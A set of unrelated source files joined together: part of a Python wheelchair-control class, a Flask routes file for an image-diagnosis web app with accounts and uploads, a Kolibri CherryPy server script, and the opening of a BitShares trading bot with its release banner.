            logFile.close()
    #Transmit Log Function
    def transmitLog(self, entry):
        """Append a timestamped row to the transmit log.

        NOTE(review): the header row written in __init__ is comma separated
        but entries here are joined with ": " — confirm the intended format.
        """
        currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
        logEntry = currentDateTime + ": " + entry
        if self.logging == True:
            #open a txt file to use for logging
            logFile = open(self.transmitLogFilePath, "a+")
            logFile.write(logEntry + "\n")
            logFile.close()
    #Send and Receive Messages with implemented logging
    @threaded
    def gamepad(self):
        """Poll the first joystick forever and translate it into API commands.

        Runs on its own thread (@threaded). Idles until self.gamepadRunning
        is True. A = reset, B = e-stop, X/Y = raise/lower the speed cap.
        """
        topSpeed = 30
        try:
            pygame.init()
            pygame.joystick.init()
            #Check number of gamepads
            gamepads = pygame.joystick.get_count()
            #Log Entry
            self.log("INFO = "+str(gamepads)+" gamepads avalible.")
            if gamepads > 0:
                #Initialise first gamepad
                j = pygame.joystick.Joystick(0)
                j.init()
                #Check axis avalible
                axis = j.get_numaxes()
                #Log Entry
                self.log("INFO = Gamepad with "+str(axis)+" axis has been initiated.")
                while 1:
                    while self.gamepadRunning:
                        #Get Current Data
                        pygame.event.get()
                        xAxisLeft = j.get_axis(0)
                        yAxisLeft = j.get_axis(1)
                        aButton = j.get_button(0)
                        bButton = j.get_button(1)
                        yButton = j.get_button(2)
                        xButton = j.get_button(3)
                        #Mapped Data for API (axes are negated: stick up = forward)
                        speed = int(-yAxisLeft*topSpeed)
                        angle = int(-xAxisLeft*100)
                        #On button presses start and stop wheelchair
                        if aButton == True:
                            self.reset()
                        if bButton == True:
                            self.eStop()
                        if xButton == True:
                            topSpeed = topSpeed + 1
                            if topSpeed > 100:
                                topSpeed = 100
                            self.log("INFO = Top Speed is now "+str(topSpeed))
                        if yButton == True:
                            topSpeed = topSpeed - 1
                            if topSpeed < 0:
                                topSpeed = 0
                            self.log("INFO = Top Speed is now "+str(topSpeed))
                        #If new command has been identified then send new data to API
                        if (self.setSpeed != speed) or (self.setAngle != angle):
                            self.transmitCommand(speed,angle,"SEND")
        except:
            #Log Entry
            self.log("STATUS = No Gamepads are avalible. Have you connected any?")
    #Converts speed in m/s to arbitary units for commands
    def getSpeedValue(self, speed):
        """Convert a metric speed (m/s) to the API's arbitrary integer units."""
        #Linear Relationship parmamters for conversion
        m = 0.0319
        c = -0.1
        speedArbitary = int((speed - c)/m)
        return speedArbitary
    #Converts speed in arbitary unit to metrics
    def getSpeedMetric(self, speed):
        """Convert an API speed value back to m/s (rounded to 2 d.p.)."""
        #Linear Relationship parmamters for conversion
        m = 0.0319
        c = -0.1
        speedMetric = (m*speed)+c
        speedMetric = round(speedMetric,2)
        return speedMetric
    #returns the distance travelled based on the speed
    @staticmethod
    def distanceTravelled(speed, time):
        """Return distance = speed * time (units follow the caller's inputs)."""
        distance = speed*time
        return distance
    #parse response
    def decodeResponse(self, receivedMessage):
        """Parse a CSV telemetry line into the cached telemetry attributes.

        Expected order: right current, left current, battery voltage, status.
        NOTE(review): order inferred from the assignments below — confirm
        against the device firmware.
        """
        if receivedMessage != "":
            data = receivedMessage.split(",")
            if len(data) >= 4:
                self.batteryVoltage = float(data[2])
                self.rightMotorCurrent = float(data[0])
                self.leftMotorCurrent = float(data[1])
                self.status = data[3]
                print("BATTERY ="+str(self.batteryVoltage))
                # Mark the telemetry as fresh.
                self.dataAge = time.time()
    #Determine battery percentage
    def batteryPercent(self):
        """Map batteryVoltage onto 0-100% (23.6 V empty, 25.6 V full)."""
        percent = ((self.batteryVoltage - 23.6)/2)*100
        percent = round(percent,2)
        if percent < 0:
            percent = 0
        elif percent > 100:
            percent = 100
        return percent
    #Determine Power Consumption (in Watts)
    def powerConsumed(self):
        """Refresh telemetry, then estimate power draw in watts (P = V * I)."""
        self.transmitCommand(self.setSpeed,self.setAngle,"SEND")
        #Accounting for Baseload Current Consumption (A)
        current = 1.25
        #Calculation Carried out using simple P=VI Equation
        current = current + self.rightMotorCurrent + self.leftMotorCurrent
        #P=V*I
        power = self.batteryVoltage*current
        #Round to 2 Decimal Places
        power = round(power,2)
        return power
    #Speed Ramping Function
    def rampSpeed(self, newSpeed, acceleration):
        """Step the set speed toward *newSpeed*, one unit per 1/acceleration s."""
        #Update Variables Before Starting
        self.getUpdate()
        delay = 1/acceleration
        delay = int(delay)
        command = "RUN"
        #Direction Forward
        if newSpeed >= 0:
            #Accelerate
            if newSpeed > self.setSpeed:
                while (newSpeed != self.setSpeed) and (self.connected == True):
                    speed = self.setSpeed + 1
                    self.transmitCommand(speed,self.setAngle,command)
                    time.sleep(delay)
            #Decelerate
            elif newSpeed < self.setSpeed:
                while (newSpeed != self.setSpeed) and (self.connected == True):
                    speed = self.setSpeed - 1
                    self.transmitCommand(speed,self.setAngle,command)
                    time.sleep(delay)
        #Direcion Reverse
        if newSpeed < 0:
            #Accelerate
            # NOTE(review): the reverse branches sleep before transmitting,
            # the forward branches after — confirm this asymmetry is intended.
            if newSpeed < self.setSpeed:
                while (newSpeed != self.setSpeed) and (self.connected == True):
                    speed = self.setSpeed - 1
                    time.sleep(delay)
                    self.transmitCommand(speed,self.setAngle,command)
            #Decelerate
            elif newSpeed > self.setSpeed:
                while (newSpeed != self.setSpeed) and (self.connected == True):
                    speed = self.setSpeed + 1
                    time.sleep(delay)
                    self.transmitCommand(speed,self.setAngle,command)
        if self.connected == True:
            self.log("INFO = Speed has been ramped to "+str(newSpeed)+" with an acceleration of "+str(acceleration))
        else:
            self.log("ERROR = Wheelchair speed cannot be ramped.")
        return newSpeed
    #Function to change the turn the wheelchair a specific angle
    def turn(self, angle):
        """Turn roughly *angle* degrees by driving a timed arc, then stop."""
        # Empirical degrees-per-second divisor for the timed turn.
        factor = 40
        if angle < 0:
            delay = (-angle)/factor
            self.transmitCommand(30,100,"SEND")
            time.sleep(delay)
            self.transmitCommand(0,0,"SEND")
        elif angle > 0:
            delay = angle/factor
            self.transmitCommand(-30,100,"SEND")
            time.sleep(delay)
            self.transmitCommand(0,0,"SEND")
        else:
            self.transmitCommand(0,0,"SEND")
        if self.connected == True:
            self.log("INFO = Wheelchair has turned "+str(angle)+" degrees.")
        else:
            self.log("ERROR = Wheelchair has not turned as requested.")
    #Function to change the move the wheelchair a specific distance in meters
    def move(self, distance):
        """Drive forward roughly *distance* metres by running a timed burst."""
        factor = 1
        delay = int(distance/factor)
        self.transmitCommand(30,0,"SEND")
        time.sleep(delay)
        self.transmitCommand(0,0,"SEND")
        if self.connected == True:
            self.log("INFO = Wheelchair has moved "+str(distance)+"m.")
        else:
            self.log("ERROR = Wheelchair cannot be moved.")
    #Function to change the move the wheelchair a specific distance in meters
    def changeRadius(self, radius):
        """Step the steering angle toward *radius* one unit at a time.

        NOTE(review): the loops compare against self.setAngle, which only
        changes if transmitCommand succeeds — a dropped connection could
        loop indefinitely. Confirm acceptable.
        """
        delay = 0.1
        factor = 1
        radius = radius/factor
        radius = int(radius)
        angle = self.setAngle
        while radius > self.setAngle:
            angle = angle + 1
            self.transmitCommand(self.setSpeed,angle,"SEND")
            time.sleep(delay)
        while radius < self.setAngle:
            angle = angle - 1
            self.transmitCommand(self.setSpeed,angle,"SEND")
            time.sleep(delay)
        if self.connected == True:
            self.log("INFO = Wheelchair turning radius is now "+str(radius)+"m.")
        else:
            self.log("ERROR = Wheelchair turning radius cannot be changed.")
    #Set the steering angle directly
    def changeAngle(self, angle):
        """Send a new steering angle; cache it only if the API accepted it."""
        command = "SEND"
        self.transmitCommand(self.setSpeed,angle,command)
        if self.connected == True:
            self.setAngle = angle
            self.log("INFO = Wheelchair turning angle is now "+str(angle))
        else:
            self.log("ERROR = Wheelchair angle cannot be changed")
    def changeSpeed(self, speed):
        """Send a new speed set-point; cache it only if the API accepted it."""
        speed = int(speed)
        command = "SEND"
        self.transmitCommand(speed,self.setAngle,command)
        if self.connected == True:
            self.setSpeed = speed
            self.log("INFO = Wheelchair speed is now set as "+str(speed))
        else:
            self.log("ERROR = Wheelchair speed cannot be changed")
    #Emergency Stop the wheelchair
    def eStop(self):
        """Issue an immediate STOP command."""
        self.transmitCommand(0,0,"STOP")
        if self.connected == True:
            self.log("INFO: Wheelchair has Emergency Stopped.")
        else:
            self.log("ERROR = Warning, the Wheelchair cannot be stopped!")
    #Reset the wheelchair
    def reset(self):
        """Issue a RESET and block while the controller boots (bootTime s)."""
        self.transmitCommand(0,0,"RESET")
        if self.connected == True:
            self.log("INFO = Wheelchair is being reset.")
            for x in range(self.bootTime,0,-1):
                self.log("INFO = "+str(x)+" seconds remaining until wheelchair completes boot up.")
                time.sleep(1)
        else:
            self.log("ERROR = Wheelchair cannot be reset.")
    #Funtion to Update Variables
    def getUpdate(self):
        """Re-poll the API if the cached telemetry is older than 5 seconds."""
        refreshRate = 5
        elapsedTime = time.time() - self.dataAge
        if elapsedTime > refreshRate:
            self.transmitCommand(self.setSpeed,self.setAngle,"SEND")
            if self.connected == False:
                self.log("INFO = Communication link down.")
    #Function to Calculate Speed Lmit bases on the value of the closest point
    def calcMaxSpeed(self, closestObject):
        """Derive a new speed limit from the closest obstacle distance.

        Uses a cubic deceleration profile; clamps the current speed if it
        now exceeds the limit.
        """
        x = closestObject
        a = -5.6593
        b = 29.089
        c = -5.1123
        d = 3.3333
        #Third Order Deceleration Custom Profile
        maxSpeedNew = (a*math.pow(x,3))+(b*math.pow(x,2))+(c*x)+d
        maxSpeedNew = round(maxSpeedNew,2)
        self.maxSpeed = int(maxSpeedNew)
        #Prevent Speeds higher than the limit set
        if self.setSpeed > 0:
            speedMagnitude = int(self.setSpeed)
            if speedMagnitude > self.maxSpeed:
                self.transmitCommand(self.maxSpeed,self.setAngle,"SEND")
    #Collision Avoidance Algorithm
    @threaded
    def collisionAvoidance(self):
        """Background loop that keeps the set speed pinned to maxSpeed."""
        while 1:
            #If Wheelchair is breaking the Speed Limit (Set by Closest Object)
            if self.setSpeed > self.maxSpeed:
                #Determine Rate of Decelleration depending on delta
                decceleration = self.setSpeed - self.maxSpeed
                #Adjust Speed
                self.rampSpeed(self.maxSpeed,decceleration)
            elif self.setSpeed < self.maxSpeed:
                #Determine Rate of Acceleration depending on delta
                acceleration = self.maxSpeed - self.setSpeed
                #Adjust Speed
                self.rampSpeed(self.maxSpeed,acceleration)
    #Send and Receive Messages with implemented logging
    def transmitCommand(self, speed, angle, command):
        """POST one speed/angle/command triplet to the API and decode the reply.

        Caches the set-points and flags self.connected on HTTP 200; any
        request failure marks the link down.
        """
        #Start Timing
        start = time.time()
        #Make sure values passed are integars
        speed = int(speed)
        angle = int(angle)
        #Check speed does not exceed limit
        # NOTE(review): reverse (negative) speeds are not clamped — confirm.
        if speed > 0:
            if speed > self.maxSpeed:
                speed = self.maxSpeed
        #Create form of the payload
        payload = str(speed)+","+str(angle)+","+ command
        #combine with host address
        message = self.host + payload
        try:
            response = requests.post(message,timeout=2)
            data = response.content.decode("utf-8").split("\r\n")
            if self.debug == True:
                self.log("INFO = Transmission response code is "+str(response.status_code))
            #Write log entry regarding data transmitted
            self.transmitLog(str(speed) + "," + str(angle) + "," + command)
            if data[0] != "":
                #Write log entry regarding response
                self.receiveLog(data[0])
                self.log("STATUS = Received data is as follows; " + data[0])
                #Decode Data
                self.decodeResponse(data[0])
            if response.status_code == 200:
                self.connected = True
                self.setSpeed = speed
                self.setAngle = angle
                self.setCommand = command
            if self.debug == True:
                end = time.time()
                print("STATUS: Sending '",payload,"' took %.2f seconds." % round((end-start),2))
        except:
            self.log("ERROR = Could not access wheelchair API")
            self.connected = False
routes.py | from app import app, db, mail
from flask import render_template, flash, redirect, url_for, request, jsonify, session
from app.forms import LoginForm, RegistrationForm
from flask_login import current_user, login_user, logout_user, login_required
from flask_mail import Message
from app.models import User, History, Feedback
from werkzeug.urls import url_parse
from datetime import datetime, timedelta
from app.forms import EditProfileForm, UploadForm, PasswordChangeForm, EmailForm, PasswordForm, FeedbackForm
from PIL import Image
from threading import Thread
import time
from itsdangerous import URLSafeTimedSerializer
import hashlib
import datetime as dater
import os
import urllib.request
from werkzeug.utils import secure_filename
import base64
from flask_uploads import UploadSet, configure_uploads, IMAGES, patch_request_class
import json
import numpy as np
import requests
from .preprocess import load
from flask_cors import CORS
from sqlalchemy.exc import IntegrityError
# Only these image extensions may be uploaded for diagnosis.
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])
UPLOAD_FOLDER = os.path.join(os.getcwd(), 'uploads')
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
# Hard cap on request payloads: 16 MB.
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
app.config['UPLOADED_IMAGES_DEST'] = UPLOAD_FOLDER
app.config['UPLOADED_PHOTOS_DEST'] = os.path.join(
    os.getcwd(), 'app', 'static', 'profile') # you'll need to create a folder named uploads
# Two Flask-Uploads sets: 'photos' for profile pictures, 'images' for scans.
photos = UploadSet('photos', IMAGES)
images = UploadSet('images', IMAGES)
configure_uploads(app, photos)
configure_uploads(app, images)
patch_request_class(app) # set maximum file size, default is 16MB
CORS(app)
@app.route('/', methods=['GET'])
@app.route('/index', methods=['GET'])
def index():
    """Render the public landing page with an empty feedback form."""
    return render_template('index.html', form=FeedbackForm())
@app.route('/', methods=['POST'])
@app.route('/index', methods=['POST'])
def feeds():
    """Persist a landing-page feedback submission, then bounce back to index."""
    form = FeedbackForm()
    if not form.validate_on_submit():
        # Invalid submission: re-render the page so validation errors show.
        return render_template('index.html', form=form)
    entry = Feedback(name=form.name.data, email=form.email.data,
                     message=form.message.data)
    db.session.add(entry)
    db.session.commit()
    return redirect(url_for('index'))
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Authenticate by email/password and start a session."""
    if current_user.is_authenticated:
        return redirect(url_for('dashboard'))
    form = LoginForm()
    if form.validate_on_submit():
        user = User.query.filter_by(email=form.email.data).first()
        bad_credentials = user is None or not user.check_password(form.password.data)
        if bad_credentials:
            flash('Invalid username or password')
            return redirect(url_for('login'))
        login_user(user)
        # Only honour same-site "next" targets (guards against open redirects).
        next_page = request.args.get('next')
        if not next_page or url_parse(next_page).netloc != '':
            next_page = url_for('dashboard')
        return redirect(next_page)
    return render_template('login.html', title='Sign In', form=form)
@app.route('/logout')
def logout():
    """End the current session and return to the landing page."""
    logout_user()
    return redirect(url_for('index'))
@app.route('/register', methods=['GET', 'POST'])
def register():
    """Create a new account, then email a confirmation link."""
    if current_user.is_authenticated:
        return redirect(url_for('dashboard'))
    form = RegistrationForm()
    if not form.validate_on_submit():
        return render_template('signUp.html', title='Register', form=form)
    new_user = User(email=form.email.data,
                    firstname=form.firstname.data,
                    lastname=form.lastname.data,
                    gender=form.gender.data,
                    profession=form.profession.data)
    new_user.set_password(form.password.data)
    db.session.add(new_user)
    db.session.commit()
    send_confirmation_email(new_user.email)
    flash('Congratulations, you are now a registered user!')
    flash('Thanks for registering! Please check your email to confirm your email address.', 'success')
    return redirect(url_for('login'))
@app.route('/reset', methods=["GET", "POST"])
def reset():
    """Start a password reset: email a signed reset link to a confirmed user."""
    if current_user.is_authenticated:
        return redirect(url_for('dashboard'))
    form = EmailForm()
    if form.validate_on_submit():
        try:
            # first_or_404 aborts with an HTTPException for unknown emails;
            # the bare except below catches it and re-renders with an error.
            user = User.query.filter_by(email=form.email.data).first_or_404()
        except:
            flash('Invalid email address!', 'error')
            return render_template('password_reset_email.html', form=form)
        # Only confirmed addresses may receive reset links.
        if user.email_confirmed:
            send_password_reset_email(user.email)
            flash('Please check your email for a password reset link.', 'success')
        else:
            flash('Your email address must be confirmed before attempting a password reset.', 'error')
        return redirect(url_for('login'))
    return render_template('password_reset_email.html', form=form)
@app.route('/reset/<token>', methods=["GET", "POST"])
def reset_with_token(token):
    """Complete a password reset using the signed token from the email link."""
    try:
        # Tokens are salted and expire after one hour (max_age=3600).
        password_reset_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
        email = password_reset_serializer.loads(token, salt='password-reset-salt', max_age=3600)
    except:
        flash('The password reset link is invalid or has expired.', 'error')
        return redirect(url_for('login'))
    form = PasswordForm()
    if form.validate_on_submit():
        try:
            user = User.query.filter_by(email=email).first_or_404()
        except:
            flash('Invalid email address!', 'error')
            return redirect(url_for('login'))
        user.set_password(form.password.data)
        db.session.add(user)
        db.session.commit()
        flash('Your password has been updated!', 'success')
        return redirect(url_for('login'))
    return render_template('reset_password_with_token.html', form=form, token=token)
@app.route('/confirm/<token>')
def confirm_email(token):
    """Confirm a user's email address from the signed link sent at sign-up."""
    try:
        confirm_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
        email = confirm_serializer.loads(token, salt='email-confirmation-salt', max_age=3600)
    except:
        flash('The confirmation link is invalid or has expired.', 'error')
        return redirect(url_for('login'))
    # NOTE(review): first() may return None if the account was deleted after
    # the token was issued; the attribute access below would then raise.
    user = User.query.filter_by(email=email).first()
    if user.email_confirmed:
        if current_user.is_authenticated:
            flash('Account already confirmed.', 'info')
        else:
            flash('Account already confirmed. Please login.', 'info')
            return redirect(url_for('login'))
    else:
        user.email_confirmed = True
        user.email_confirmed_on = datetime.utcnow()
        db.session.add(user)
        db.session.commit()
        flash('Thank you for confirming your email address!')
    return redirect(url_for('dashboard'))
@app.route('/resend_confirmation')
@login_required
def resend_email_confirmation():
    """Re-send the confirmation email for the logged-in user."""
    if current_user.email_confirmed:
        flash('Email is already confirmed.')
        return redirect(url_for('edit_profile'))
    try:
        send_confirmation_email(current_user.email)
        flash('Email sent to confirm your email address. Please check your email!', 'success')
    # NOTE(review): mail/serializer failures are unlikely to surface as
    # IntegrityError — confirm the intended exception type.
    except IntegrityError:
        flash('Error! Unable to send email to confirm your email address.', 'error')
    return redirect(url_for('edit_profile'))
@app.route('/change_password', methods=['GET', 'POST'])
@login_required
def change_password():
    """Let the logged-in user replace their password after re-authenticating."""
    form = PasswordChangeForm()
    if form.validate_on_submit():
        # The current password must match before the new one is stored.
        if current_user.check_password(form.password.data):
            current_user.set_password(form.password2.data)
            flash('Your password has been changed.')
            db.session.commit()
        else:
            # NOTE(review): this branch fires when the OLD password was wrong,
            # so the flash wording is misleading — confirm intent.
            flash('Your password is still the same.')
        return redirect(url_for('change_password'))
    if current_user.photo == None:
        return render_template('password_change.html', form=form)
    file_url = photos.url(current_user.photo)
    return render_template('password_change.html', form=form, file_url=file_url)
@app.route('/edit_profile', methods=['GET', 'POST'])
@login_required
def edit_profile():
    """View and update the logged-in user's profile details and avatar."""
    form = EditProfileForm()
    if form.validate_on_submit():
        current_user.firstname = form.firstname.data
        current_user.lastname = form.lastname.data
        current_user.gender = form.gender.data
        current_user.profession = form.profession.data
        file = request.files['photo']
        if file:
            # Remove any previous avatar from disk before saving the new one.
            if current_user.photo != None:
                file_path = photos.path(current_user.photo)
                os.remove(file_path)
            photos.save(file)
            current_user.photo = file.filename
        db.session.commit()
        flash('Your changes have been saved.')
        return redirect(url_for('edit_profile'))
    elif request.method == 'GET':
        # Pre-populate the form with the stored profile values.
        form = EditProfileForm(current_user.email)
        form.email.data = current_user.email
        form.firstname.data = current_user.firstname
        form.lastname.data = current_user.lastname
        form.gender.data = str(current_user.gender)
        form.profession.data = str(current_user.profession)
    if current_user.photo == None:
        return render_template('settings.html', title='Edit Profile', form=form)
    file_url = photos.url(current_user.photo)
    return render_template('settings.html', title='Edit Profile', form=form, file_url=file_url)
@app.route('/history', methods=['GET'])
@login_required
def history():
    """Paginated list of past diagnoses, newest first."""
    page = request.args.get('page', 1, type=int)
    # NOTE(review): the empty .filter() returns EVERY user's history rather
    # than just the current user's — confirm this shared view is intentional.
    imag = History.query.filter().order_by(History.timestamp.desc()).paginate(
        page, app.config['HISTORY_PER_PAGE'], False)
    next_url = url_for('history', page=imag.next_num) \
        if imag.has_next else None
    prev_url = url_for('history', page=imag.prev_num) \
        if imag.has_prev else None
    if current_user.photo == None:
        return render_template('history.html', imag=imag.items, next_url=next_url,
                               prev_url=prev_url)
    file_url = photos.url(current_user.photo)
    return render_template('history.html', file_url=file_url, imag=imag.items, next_url=next_url,
                           prev_url=prev_url)
@app.route('/dashboard', methods=['GET'])
@login_required
def dashboard():
    """Show the upload dashboard along with a running image count."""
    form = UploadForm()
    image_count = History.query.filter().order_by(History.timestamp.desc()).count()
    if current_user.photo == None:
        return render_template('dashboard.html', form=form, image_count=image_count)
    return render_template('dashboard.html', form=form,
                           file_url=photos.url(current_user.photo),
                           image_count=image_count)
@app.route('/dashboard', methods=['POST'])
@login_required
def upload_file():
    """Accept an image upload, run remote inference, store and flash the result."""
    # check if the post request has the file part
    form = UploadForm()
    if form.validate_on_submit():
        file = request.files['photo']
        ext = file.filename.rsplit('.', 1)[1]
        # Store under a YYYY-MM-DD folder with a timestamped filename.
        timestr = time.strftime("%Y%m%d-%H%M%S")
        today = dater.date.today()
        todaystr = today.isoformat()
        nam = timestr + "." + ext
        filename = images.save(file, folder=todaystr, name=nam)
        file_url = images.url(filename)
        print(file_url)
        # Decoding and pre-processing base64 image
        img = load(file)
        # Creating payload for TensorFlow serving request
        data = json.dumps({"signature_name": "serving_default",
                           "instances": img.tolist()})
        # # Making POST request
        headers = {"content-type": "application/json"}
        # NOTE(review): "IP_ROUTE" is a placeholder URL — it must be replaced
        # with the real TensorFlow Serving endpoint before deployment.
        json_response = requests.post(
            "IP_ROUTE", data=data, headers=headers)
        # Decoding results from TensorFlow Serving server
        predictions = json_response.json()['predictions'][0][0]
        # Give a true or false value to the prediction
        # NOTE(review): a score of exactly 1 maps to NEGATIVE while scores in
        # (0.6, 1) map to POSITIVE — confirm this boundary handling is intended.
        if predictions == 1:
            predictval = 0
        elif predictions < 1 and predictions > 0.6:
            predictval = 1
        else:
            predictval = 0
        # Save to database
        upload = History(photo=filename, patient=form.patient.data,
                         photo_url=file_url, user_email=current_user.email, status=predictval)
        db.session.add(upload)
        db.session.commit()
        # Give diagnosis
        if predictval == 1:
            resultstat = 'POSITIVE'
        elif predictval == 0:
            resultstat = 'NEGATIVE'
        flash(resultstat)
        return redirect(url_for("dashboard"))
    image_count = History.query.filter().order_by(History.timestamp.desc()).count()
    if current_user.photo == None:
        return render_template('dashboard.html', form=form, image_count=image_count)
    file_url = photos.url(current_user.photo)
    return render_template("dashboard.html", form=form, file_url=file_url, image_count=image_count)
@app.route('/delete/<folder>/<filename>')
@login_required
def delete_file(folder, filename):
    """Admin-only: remove an image file and its History row."""
    # NOTE(review): admin identity is a hard-coded email — consider a role flag.
    if current_user.email != "admin@example.com":
        flash('Sorry only admin can delete images')
        return redirect(url_for('history'))
    file_p = folder+"/"+filename
    file_path = images.path(folder+"/"+filename)
    item = History.query.filter_by(photo=file_p).first_or_404()
    db.session.delete(item)
    db.session.commit()
    # File is only unlinked after the DB row is gone.
    os.remove(file_path)
    return redirect(url_for('history'))
@app.route('/view/<folder>/<filename>')
@login_required
def view_file(folder, filename):
    """Display a single stored image together with its History record."""
    rel_path = folder + "/" + filename
    file_url = images.url(rel_path)
    item = History.query.filter_by(photo=rel_path).first_or_404()
    if current_user.photo == None:
        return render_template("browser.html", file_url=file_url, item=item)
    profile_url = photos.url(current_user.photo)
    return render_template("browser.html", file_url=file_url, item=item, profilepic=profile_url)
@app.route('/about')
def about():
    """Static 'about' page."""
    return render_template('about.html')
# route and function to handle the upload page
def allowed_file(filename):
    """Return True if *filename* has an extension listed in ALLOWED_EXTENSIONS."""
    if '.' not in filename:
        return False
    extension = filename.rsplit('.', 1)[1].lower()
    return extension in ALLOWED_EXTENSIONS
@app.before_request
def before_request():
    """Keep the 15-minute rolling session timeout active on every request."""
    session.permanent = True
    # NOTE(review): mutating app config on every request works but could be
    # set once at startup.
    app.permanent_session_lifetime = timedelta(minutes=15)
def send_async_email(msg):
    """Send *msg* inside an application context; intended to run on a thread."""
    with app.app_context():
        mail.send(msg)
def send_email(subject, recipients, text_body, html_body):
    """Build a Message and dispatch it on a background thread (non-blocking)."""
    msg = Message(subject, recipients=recipients)
    msg.body = text_body
    msg.html = html_body
    Thread(target=send_async_email, args=[msg]).start()
def send_confirmation_email(user_email):
    """Email a salted, time-limited confirmation link to *user_email*."""
    serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
    token = serializer.dumps(user_email, salt='email-confirmation-salt')
    confirm_url = url_for('confirm_email', token=token, _external=True)
    html = render_template('email_confirmation.html', confirm_url=confirm_url)
    send_email('Confirm Your Email Address', [user_email], html, html)
def send_password_reset_email(user_email):
    """Email a salted, time-limited password-reset link to *user_email*."""
    serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
    token = serializer.dumps(user_email, salt='password-reset-salt')
    reset_url = url_for('reset_with_token', token=token, _external=True)
    html = render_template('email_password_reset.html', password_reset_url=reset_url)
    send_email('Password Reset Requested', [user_email], html, html)
|
server.py | import os
import atexit
import multiprocessing
import cherrypy
from django.conf import settings
from django.core.management import call_command
from kolibri.content.utils import paths
from kolibri.content.utils.annotation import update_channel_metadata_cache
from kolibri.deployment.default.wsgi import application
def start_background_workers():
    """Spawn the django-q 'qcluster' worker in a child process."""
    p = multiprocessing.Process(target=call_command, args=("qcluster",))
    # note: atexit normally only runs when python exits normally, aka doesn't
    # exit through a signal. However, this function gets run because cherrypy
    # catches all the various signals, and runs the atexit callbacks.
    atexit.register(p.terminate)
    p.start()
def start():
    """Prepare static assets and migrations, then boot workers and the server."""
    # TODO(aronasorman): move to install/plugin-enabling scripts, and remove from here
    call_command("collectstatic", interactive=False)
    call_command("collectstatic_js_reverse", interactive=False)
    call_command("migrate", interactive=False, database="default")
    call_command("migrate", interactive=False, database="ormq")
    # start the qcluster process
    start_background_workers()
    update_channel_metadata_cache()
    # Blocks here until the cherrypy engine stops.
    run_server()
def run_server():
    """Graft the WSGI app and static mounts onto cherrypy and serve on :8080."""
    # Mount the application
    cherrypy.tree.graft(application, "/")
    serve_static_dir(settings.STATIC_ROOT, settings.STATIC_URL)
    serve_static_dir(settings.CONTENT_DATABASE_DIR, paths.get_content_database_url("/"))
    serve_static_dir(settings.CONTENT_STORAGE_DIR, paths.get_content_storage_url("/"))
    # Unsubscribe the default server
    cherrypy.server.unsubscribe()
    cherrypy.config.update({'server.socket_host': "0.0.0.0",
                            'server.socket_port': 8080,
                            'server.thread_pool': 30,
                            'log.screen': True})
    # Instantiate a new server object
    server = cherrypy._cpserver.Server()
    # Subscribe this server
    server.subscribe()
    # Start the server engine (Option 1 *and* 2); block() keeps the process alive.
    cherrypy.engine.start()
    cherrypy.engine.block()
def serve_static_dir(root, url):
    """Mount a cherrypy staticdir handler that serves directory *root* at *url*."""
    parent, leaf = os.path.split(root)
    handler = cherrypy.tools.staticdir.handler(
        section="/",
        dir=leaf,
        root=os.path.abspath(parent),
    )
    cherrypy.tree.mount(handler, url)
|
EV0.00000002.py | #=======================================================================
VERSION = 'EXTINCTION EVENT v0.00000002 alpha release'
#=======================================================================
# python modules
import os
import sys
import json
import time
import math
import random
import warnings
import requests
import matplotlib
import numpy as np
from random import random, shuffle, randint
from getpass import getpass
from datetime import datetime
import matplotlib.pyplot as plt
import matplotlib.cbook as cbook
import matplotlib.dates as mdates
from ast import literal_eval as literal
from statistics import mean, median, mode
from multiprocessing import Process, Value, Array
# bitshares modules
from bitshares import BitShares
from bitshares.market import Market
from bitshares.account import Account
from bitshares.blockchain import Blockchain
# Smallest price increment; used below as the MANUAL_BUY floor.
SATOSHI = 0.00000001
# Its reciprocal; used below as the MANUAL_SELL ceiling.
ANTISAT = 1 / SATOSHI
def banner():
    # No-op: exists only to hold the author's release-notes/credits docstring.
    #===================================================================
    '''
    March 2018:
    Possible Hack Of Third-Party Tools Affects Binance Exchange Users.
    : Cointelegraph
    Statement on Potentially Unlawful Online Digital Asset Platforms
    : SEC.gov
    I stand upon the shoulders of giants and as such,
    invite you to stand upon mine.
    Use my work with or without attribution;
    I make no claim of "intellectual property."
    My ideas are the result of countless millenia of evolution
    - they belong to humanity.
    : Jameson Lopp @lopp
    NOTE THIS IS ALPHA RELEASE TO PUBLIC DOMAIN WITH NO WARRANTY
    #
    # https://www.youtube.com/watch?v=5xouOnHxYUw
    # https://www.youtube.com/watch?v=jJxKXOTNXjc
    #
    # Rated R Under 17 NOT Admitted Without Parent
    #
    # My liability is ZERO; "this script licenced: don't be a bitch^TM"
    #
    # WTFPLv2 March 1765
    #
    use this, get lambo, deposit 7.777% skriptbunny tithing here:
    (BTS) litepresence1
    (BTC) 374gjPuhokrWj8KJu8NnMBGzpbHWcVeE1k
    #
    # 0.05 BTC each for AI tuned to last 365 days of any alt/btc pair
    # 1 BTC each for machine optimized algo for top 100 alt/btc pair
    #
    # litepresence @ pastecoin.com for sales
    # finitestate@tutamail for inquiries
    #
    ########################
    #
    # THE DESTROYER,
    # litepresence - 2018
    #
    '''
#===================================================================
''' FEATURES '''
#===================================================================
'''
ALT/BTC data from cryptocompare.com as signal
Bitshares DEX open.ALT/open.BTC for trading
- Play simple effective 4 state 50 day cross
- uses live 2h arrays to generate moving averages
- ma1xma2 is about 17x50 day simple moving average cross
- cross plus +/- threshold changes state logic from bull to bear
- Bull Logic
buy 17 day support
sell 17 day x ~1.5 selloff
- Bear logic
sell 17 day resistance
buy 17 day x ~0.75 despair
- dynamic stoploss upon market shift
- approximately 7-20 day trade frequency depending upon pair
- announces machine state on plot
- Make Markets, Close Margins, Support Trends
- Iceberg entry and exit
- Bot runs local
- Backtest Engine Included
- Maintains storage from backtest to live session
'''
#===================================================================
''' FEATURES v0.00000002'''
#===================================================================
'''
Rogue Node Immunity:
A background daemon process maintains a list of low latency nodes
for buy/sell/cancel/orders ops in a text file
distributed exchange prices and orderbook are verified and curated
using multinode statistical approach with daemon processes
open orders are checked in triplicate on multiple nodes
dex() definitions have been upgraded after consultation with
